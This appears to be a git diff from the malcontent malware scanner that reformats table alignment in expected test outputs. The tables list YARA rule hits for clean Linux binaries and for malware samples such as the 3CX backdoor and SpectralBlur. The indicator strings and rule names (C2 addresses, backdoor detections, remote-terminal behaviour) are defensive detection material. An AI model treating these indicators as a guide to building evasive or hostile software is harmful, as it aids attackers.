 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [throttle_port](https://github.com/search?q=throttle_port&type=code)<br>[upstream_port](https://github.com/search?q=upstream_port&type=code)<br>[register_port](https://github.com/search?q=register_port&type=code)<br>[virtser_port](https://github.com/search?q=virtser_port&type=code)<br>[megasas_port](https://github.com/search?q=megasas_port&type=code)<br>[release_port](https://github.com/search?q=release_port&type=code)<br>[message_port](https://github.com/search?q=message_port&type=code)<br>[serial_port](https://github.com/search?q=serial_port&type=code)<br>[handle_port](https://github.com/search?q=handle_port&type=code)<br>[mptsas_port](https://github.com/search?q=mptsas_port&type=code)<br>[remove_port](https://github.com/search?q=remove_port&type=code)<br>[metadata_ip](https://github.com/search?q=metadata_ip&type=code)<br>[claim_port](https://github.com/search?q=claim_port&type=code)<br>[reset_port](https://github.com/search?q=reset_port&type=code)<br>[clear_port](https://github.com/search?q=clear_port&type=code)<br>[write_port](https://github.com/search?q=write_port&type=code)<br>[compare_ip](https://github.com/search?q=compare_ip&type=code)<br>[state_port](https://github.com/search?q=state_port&type=code)<br>[extract_ip](https://github.com/search?q=extract_ip&type=code)<br>[ohci_port](https://github.com/search?q=ohci_port&type=code)<br>[xhci_port](https://github.com/search?q=xhci_port&type=code)<br>[pcie_port](https://github.com/search?q=pcie_port&type=code)<br>[host_port](https://github.com/search?q=host_port&type=code)<br>[ahci_port](https://github.com/search?q=ahci_port&type=code)<br>[find_port](https://github.com/search?q=find_port&type=code)<br>[mmio_port](https://github.com/search?q=mmio_port&type=code)<br>[ehci_port](https://github.com/search?q=ehci_port&type=code)<br>[spdm_port](https://github.com/search?q=spdm_port&type=code)<br>[update_ip](https://github.com/search?q=update_ip&type=code)<br>[uhci_port](https://github.com/search?q=uhci_port&type=code)<br>[usb_port](https://github.com/search?q=usb_port&type=code)<br>[fix_port](https://github.com/search?q=fix_port&type=code)<br>[get_port](https://github.com/search?q=get_port&type=code)<br>[mem_port](https://github.com/search?q=mem_port&type=code)<br>[hub_port](https://github.com/search?q=hub_port&type=code)<br>[add_port](https://github.com/search?q=add_port&type=code)<br>[and_port](https://github.com/search?q=and_port&type=code)<br>[be_port](https://github.com/search?q=be_port&type=code)<br>[get_ip](https://github.com/search?q=get_ip&type=code)<br>[Port](https://github.com/search?q=Port&type=code)<br>[IP](https://github.com/search?q=IP&type=code)<br>[Ip](https://github.com/search?q=Ip&type=code) |
 | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) |
diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md
index 1b763dcc3..4d891e8bf 100644
--- a/tests/linux/clean/redis-server.aarch64.md
+++ b/tests/linux/clean/redis-server.aarch64.md
@@ -1,7 +1,7 @@
 ## linux/clean/redis-server.aarch64 [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [master_port](https://github.com/search?q=master_port&type=code)<br>[updatePort](https://github.com/search?q=updatePort&type=code)<br>[host_port](https://github.com/search?q=host_port&type=code)<br>[tcp_port](https://github.com/search?q=tcp_port&type=code)<br>[bus_port](https://github.com/search?q=bus_port&type=code)<br>[prev_ip](https://github.com/search?q=prev_ip&type=code)<br>[IP](https://github.com/search?q=IP&type=code) |
 | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code) |
 | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) |
diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md
index f329a66f9..9d76ebfaf 100644
--- a/tests/linux/clean/slack.md
+++ b/tests/linux/clean/slack.md
@@ -1,7 +1,7 @@
 ## linux/clean/slack [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | may check if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) |
 | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) |
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md
index d9151254c..e08289779 100644
--- a/tests/linux/clean/tree-sitter.md
+++ b/tests/linux/clean/tree-sitter.md
@@ -1,7 +1,7 @@
 ## linux/clean/tree-sitter [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
 | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) |
 | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)<br>[windows](https://github.com/search?q=windows&type=code)<br>[Windows](https://github.com/search?q=Windows&type=code)<br>[http://](http://)<br>[Darwin](https://github.com/search?q=Darwin&type=code)<br>[darwin](https://github.com/search?q=darwin&type=code)<br>[linux](https://github.com/search?q=linux&type=code)<br>[macOS](https://github.com/search?q=macOS&type=code)<br>[macos](https://github.com/search?q=macos&type=code) |
diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md
index a688d4310..63854e91e 100644
--- a/tests/linux/clean/trufflehog.md
+++ b/tests/linux/clean/trufflehog.md
@@ -1,7 +1,7 @@
 ## linux/clean/trufflehog [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)<br>[VMware](https://github.com/search?q=VMware&type=code) |
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
 | MEDIUM | [anti-static/obfuscation/syscall](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/syscall.yara#go_raw_syscall) | invokes raw system calls | [unix.RawSyscall](https://github.com/search?q=unix.RawSyscall&type=code) |
diff --git a/tests/linux/clean/viewgam.md b/tests/linux/clean/viewgam.md
index a8a13d149..d0041e1e9 100644
--- a/tests/linux/clean/viewgam.md
+++ b/tests/linux/clean/viewgam.md
@@ -1,7 +1,7 @@
 ## linux/clean/viewgam [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)<br>[http://](http://)<br>[windows](https://github.com/search?q=windows&type=code)<br>[linux](https://github.com/search?q=linux&type=code) |
 | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)<br>[<html>](https://github.com/search?q=%3Chtml%3E&type=code) |
 | MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [+parseInt(](https://github.com/search?q=%2BparseInt%28&type=code) |
diff --git a/tests/linux/clean/zipdetails.md b/tests/linux/clean/zipdetails.md
index 81b0b71db..6cc9fb61d 100644
--- a/tests/linux/clean/zipdetails.md
+++ b/tests/linux/clean/zipdetails.md
@@ -1,7 +1,7 @@
 ## linux/clean/zipdetails [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs) | many references to hexadecimal values | [0x10000000](https://github.com/search?q=0x10000000&type=code)<br>[0x08074b50](https://github.com/search?q=0x08074b50&type=code)<br>[0x02014b50](https://github.com/search?q=0x02014b50&type=code)<br>[0x06054b50](https://github.com/search?q=0x06054b50&type=code)<br>[0x06064b50](https://github.com/search?q=0x06064b50&type=code)<br>[0x07064b50](https://github.com/search?q=0x07064b50&type=code)<br>[0x08064b50](https://github.com/search?q=0x08064b50&type=code)<br>[0x05054b50](https://github.com/search?q=0x05054b50&type=code)<br>[0xE9F3F9F0](https://github.com/search?q=0xE9F3F9F0&type=code)<br>[0x7109871a](https://github.com/search?q=0x7109871a&type=code)<br>[0xf05368c0](https://github.com/search?q=0xf05368c0&type=code)<br>[0x04034b50](https://github.com/search?q=0x04034b50&type=code)<br>[0x19DB1DED](https://github.com/search?q=0x19DB1DED&type=code)<br>[0xFFFFFFFF](https://github.com/search?q=0xFFFFFFFF&type=code)<br>[0x2146444e](https://github.com/search?q=0x2146444e&type=code)<br>[0xff3b5998](https://github.com/search?q=0xff3b5998&type=code)<br>[0x71777777](https://github.com/search?q=0x71777777&type=code)<br>[0x504b4453](https://github.com/search?q=0x504b4453&type=code)<br>[0x6dff800d](https://github.com/search?q=0x6dff800d&type=code)<br>[0x42726577](https://github.com/search?q=0x42726577&type=code)<br>[0x0065](https://github.com/search?q=0x0065&type=code)<br>[0x7FFF](https://github.com/search?q=0x7FFF&type=code)<br>[0x4154](https://github.com/search?q=0x4154&type=code)<br>[0x4341](https://github.com/search?q=0x4341&type=code)<br>[0x4453](https://github.com/search?q=0x4453&type=code)<br>[0x4690](https://github.com/search?q=0x4690&type=code)<br>[0x4704](https://github.com/search?q=0x4704&type=code)<br>[0x470f](https://github.com/search?q=0x470f&type=code)<br>[0x4854](https://github.com/search?q=0x4854&type=code)<br>[0x4b46](https://github.com/search?q=0x4b46&type=code)<br>[0x4c41](https://github.com/search?q=0x4c41&type=code)<br>[0x4d49](https://github.com/search?q=0x4d49&type=code)<br>[0x4d63](https://github.com/search?q=0x4d63&type=code)<br>[0x4f4c](https://github.com/search?q=0x4f4c&type=code)<br>[0x5356](https://github.com/search?q=0x5356&type=code)<br>[0x5455](https://github.com/search?q=0x5455&type=code)<br>[0x554e](https://github.com/search?q=0x554e&type=code)<br>[0x5855](https://github.com/search?q=0x5855&type=code)<br>[0x5a4c](https://github.com/search?q=0x5a4c&type=code)<br>[0x5a4d](https://github.com/search?q=0x5a4d&type=code)<br>[0x6375](https://github.com/search?q=0x6375&type=code)<br>[0x6542](https://github.com/search?q=0x6542&type=code)<br>[0x6854](https://github.com/search?q=0x6854&type=code)<br>[0x7075](https://github.com/search?q=0x7075&type=code)<br>[0x756e](https://github.com/search?q=0x756e&type=code)<br>[0x7441](https://github.com/search?q=0x7441&type=code)<br>[0x7855](https://github.com/search?q=0x7855&type=code)<br>[0x7875](https://github.com/search?q=0x7875&type=code)<br>[0x9901](https://github.com/search?q=0x9901&type=code)<br>[0xa11e](https://github.com/search?q=0xa11e&type=code)<br>[0xA220](https://github.com/search?q=0xA220&type=code)<br>[0xCAFE](https://github.com/search?q=0xCAFE&type=code)<br>[0xfb4a](https://github.com/search?q=0xfb4a&type=code)<br>[0x0001](https://github.com/search?q=0x0001&type=code)<br>[0x0007](https://github.com/search?q=0x0007&type=code)<br>[0x0008](https://github.com/search?q=0x0008&type=code)<br>[0x0009](https://github.com/search?q=0x0009&type=code)<br>[0x000a](https://github.com/search?q=0x000a&type=code)<br>[0x2805](https://github.com/search?q=0x2805&type=code)<br>[0x8000](https://github.com/search?q=0x8000&type=code)<br>[0x334d](https://github.com/search?q=0x334d&type=code)<br>[0x2705](https://github.com/search?q=0x2705&type=code)<br>[0x2605](https://github.com/search?q=0x2605&type=code)<br>[0x07c8](https://github.com/search?q=0x07c8&type=code)<br>[0x0066](https://github.com/search?q=0x0066&type=code)<br>[0x0023](https://github.com/search?q=0x0023&type=code)<br>[0x0022](https://github.com/search?q=0x0022&type=code)<br>[0x0021](https://github.com/search?q=0x0021&type=code)<br>[0x0020](https://github.com/search?q=0x0020&type=code)<br>[0x0019](https://github.com/search?q=0x0019&type=code)<br>[0x0018](https://github.com/search?q=0x0018&type=code)<br>[0x0017](https://github.com/search?q=0x0017&type=code)<br>[0x0016](https://github.com/search?q=0x0016&type=code)<br>[0x000c](https://github.com/search?q=0x000c&type=code)<br>[0x000d](https://github.com/search?q=0x000d&type=code)<br>[0x000e](https://github.com/search?q=0x000e&type=code)<br>[0x000f](https://github.com/search?q=0x000f&type=code)<br>[0x0014](https://github.com/search?q=0x0014&type=code)<br>[0x0015](https://github.com/search?q=0x0015&type=code)<br>[0x01](https://github.com/search?q=0x01&type=code)<br>[0x1f](https://github.com/search?q=0x1f&type=code)<br>[0x0f](https://github.com/search?q=0x0f&type=code)<br>[0x7f](https://github.com/search?q=0x7f&type=code)<br>[0x03](https://github.com/search?q=0x03&type=code)<br>[0x20](https://github.com/search?q=0x20&type=code)<br>[0x3e](https://github.com/search?q=0x3e&type=code)<br>[0x3f](https://github.com/search?q=0x3f&type=code)<br>[\x00](https://github.com/search?q=%5Cx00&type=code)<br>[\x01](https://github.com/search?q=%5Cx01&type=code) |
 | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)<br>[http://](http://)<br>[Windows](https://github.com/search?q=Windows&type=code)<br>[Darwin](https://github.com/search?q=Darwin&type=code)<br>[linux](https://github.com/search?q=linux&type=code) |
 | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip files](https://github.com/search?q=zip+files&type=code)<br>[zipfile](https://github.com/search?q=zipfile&type=code)<br>[ZIP64](https://github.com/search?q=ZIP64&type=code) |
diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff
index 1f83074a3..8cada0992 100644
--- a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff
@@ -3,7 +3,7 @@
 ### 22 removed behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | -CRITICAL | [3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16) | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | -CRITICAL | [3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275) | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
 | -CRITICAL | [3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214) | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
diff --git a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
index a6594bcba..da16ce5fa 100644
--- a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
@@ -3,7 +3,7 @@
 ### 22 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
 | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
diff --git a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff
index cfae167e1..005c9cbe4 100644
--- a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff
@@ -3,14 +3,14 @@
 ### 2 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | +LOW | **[fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts)** | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)<br>[_fts_close](https://github.com/search?q=_fts_close&type=code)<br>[_fts_read](https://github.com/search?q=_fts_read&type=code)<br>[_fts_open](https://github.com/search?q=_fts_open&type=code)<br>[_fts_set](https://github.com/search?q=_fts_set&type=code) |
 | +LOW | **[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink)** | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
 
 ### 14 removed behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | -MEDIUM | [crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt) | encrypts data | [Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code)<br>[Encryption info](https://github.com/search?q=Encryption+info&type=code) |
 | -MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) |
 | -MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) |
diff --git a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
index a6594bcba..da16ce5fa 100644
--- a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
@@ -3,7 +3,7 @@
 ### 22 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
 | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
index a6594bcba..da16ce5fa 100644
--- a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
@@ -3,7 +3,7 @@
 ### 22 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
 | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
diff --git a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff
index 69c803731..1e6f61026 100644
--- a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff
@@ -3,7 +3,7 @@
 ### 14 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | +MEDIUM | **[crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt)** | encrypts data | [Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code)<br>[Encryption info](https://github.com/search?q=Encryption+info&type=code) |
 | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) |
 | +MEDIUM | **[impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent)** | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) |
@@ -22,7 +22,7 @@
 ### 2 removed behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | -LOW | [fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts) | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)<br>[_fts_close](https://github.com/search?q=_fts_close&type=code)<br>[_fts_read](https://github.com/search?q=_fts_read&type=code)<br>[_fts_open](https://github.com/search?q=_fts_open&type=code)<br>[_fts_set](https://github.com/search?q=_fts_set&type=code) |
 | -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
 
diff --git a/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md b/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md
index 684a43451..0801f1365 100644
--- a/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md
+++ b/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md
@@ -1,7 +1,7 @@
 ## macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare [🛑 HIGH]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | HIGH | [anti-static/macho/footer](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/macho/footer.yara#high_entropy_trailer) | [higher-entropy machO trailer (normally NULL) - possible viral infection](https://www.virusbulletin.com/virusbulletin/2013/06/multiplatform-madness) | [_PAGEZERO](https://github.com/search?q=_PAGEZERO&type=code) |
 | HIGH | [impact/remote_access/net_term](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_term.yara#spectralblur_alike) | uploads, provides a terminal, runs program | [tcsetattr](https://github.com/search?q=tcsetattr&type=code)<br>[_waitpid](https://github.com/search?q=_waitpid&type=code)<br>[_unlink](https://github.com/search?q=_unlink&type=code)<br>[execve](https://github.com/search?q=execve&type=code)<br>[upload](https://github.com/search?q=upload&type=code)<br>[_uname](https://github.com/search?q=_uname&type=code)<br>[shell](https://github.com/search?q=shell&type=code) |
 | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) |
diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff
index e56ed61a4..f122cac54 100644
--- a/tests/macOS/clean/ls.mdiff
+++ b/tests/macOS/clean/ls.mdiff
